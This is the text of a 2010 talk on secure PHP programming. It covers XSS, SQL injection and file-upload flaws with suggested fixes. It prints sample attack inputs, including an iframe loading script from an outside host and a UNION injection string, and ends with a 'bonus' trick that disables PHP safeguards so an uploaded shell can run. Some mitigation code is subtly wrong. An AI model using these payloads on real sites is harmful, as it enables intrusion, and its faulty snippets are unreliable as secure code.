Secure Web App Programming

in PHP
Akash Mahajan | Web Security Consultant
Speaking at BPU G on 24th April 2010
Akash Mahajan | About Me

 Freelance Web Security Consultant

 Chapter lead for null Bangalore
http://null.co.in
 Author ing 2 chapters of OWASP
Development Guide 2010 ( not alone  )
Akash Mahajan | About Me

 I test, hack, secure web applications, servers.

Consult companies on secure deployments
on AWS etc. http://akashm.com
 Doing PHP programming for a long time
now.
 Been doing application security for 5+ years.
 Used to write IDS sigs for malware and vulns
for 3 years.
Cross Site Scripting - XSS
 Injecting HTML/JavaScript into the site.
 Non-persistent/Reflected/First Order
▪ Script is taken from the request and displayed in the browser directly
▪ example.com/search?q=<script>alert(‘hi’);</script>
▪ Example.com/index.php?lang=path to php shell
 Persistent/Stored/Second Order
▪ First name of a registration form is vuln and the value is stored in the
database
▪ Hello <iframe src=http://f1y.in/0.js></iframe>
 DOM Based
▪ No example, mentioned by Amit Klien in his paper XSS of the Third
Kind
XSS - Mitigation in PHP

 Sanitize all globals ($_GET, $_POST, $_COOKIE)

 Use strip_tags()
 Use inpekt library code.google.com/p/inspekt
 Use OWASP ESAPI http://code.google.com/p/owasp-
esapi-php/
 Escape everything before displaying
 htmlentities(), htmlspeciachars()
 Client headers like user agent can be malicious
as well.
XSS - Mitigation in PHP

 Thumb rule, if its not your data consider it

tainted.
 If you can verify it, consider it trusted.
 After validating it consider it trusted bad/trusted
good.
 White listing helps in verifying good data more
than black listing.
 See examples at xssed.com, null Keeda project.
 Use frameworks like codeigniter and use their
functions.
sqli - SQL Injection

 Allowing SQL to be injected in the database query.

 Most common attack point is the search of any
dynamic website and registration forms. These two
will be definitely talking to the database.
 $sql = "SELECT * FROM table WHERE id = '" .
$_REQUEST['id'] . "'";
 id = ‘ OR 1 UNION ALL SELECT * FROM table;
 Excellent examples http://google.com/search?
q=site:slideshare.net sql injection
 Googledork – “inurl:php?id=“
SQL Injection – Mitigation in PHP

 mysql_real_escape_string()
 $dbquery = sprintf(“SELECT name FROM user WHERE
id=‘%s’”, mysql_real_escape_string(‘id’));
 Parameterized queries
 $res = $query(“SELECT name FROM user WHERE id=?”, $id);
 Standard mysql module in PHP doesn’t allow for
parameterized queries. You need mysqli
 Stored Procedures
 See a kickass example of stored proc used to hack more than
hundred thousand websites
▪ http://www.breach.com/resources/breach-security-labs/alerts/mass-
sql-injection-attack-evolutio
File Uploads

 A lot of webapps add a directory in document

root for storing file uploads and give write access.
 They don’t randomize filenames. So a specially
crafted image file which has PHP code written in
it gets saved there.
 The malicious user is now free to call it using a
GET request and it gets executed.
 http://www.scanit.be/uploads/php-file-
upload.pdf
File Uploads – Mitigation in PHP

 The usual use case is uploading of image files.

 Use getimageinfo() to get the correct mime
type of the file from the file header.
 Generate a random file name
 $rand = time() . substr(md5(microtime()), 0,
rand(5, 12));
 Return $rand and append file extension
 Ideally noexec permission should be set on
the directory where files are copied to.
So where we @?

 At this point you have reasonable ensured that

your PHP web application is not compromised.
 But the user connecting to your website are
vulnerable to session hijacking, CSRF from your
site etc.
 There are work around to the standard PHP
functions like this one for
mysql_real_escape_strings()
 http://shiflett.org/blog/2006/jan/addslashes-versus-
mysql-real-escape-string
Bonus | Don’t be ev!l ;)

 Create A File "Php.ini" In Some Writeable

Folder (777) Then Upload your Shell
 php.ini
safe_mode = OFF
disable_functions = NONE
Thanks for all the fish

 Feel free to email me your questions

 akashmahajan@gmail.c om
 Feel free to text me 99805 27182
 Come attend the monthly null BLR meeting.
It happens on 2nd Saturday of every month at
Frazier Town. The meets start at 10 AM end
by 12:30 PM – 1 PM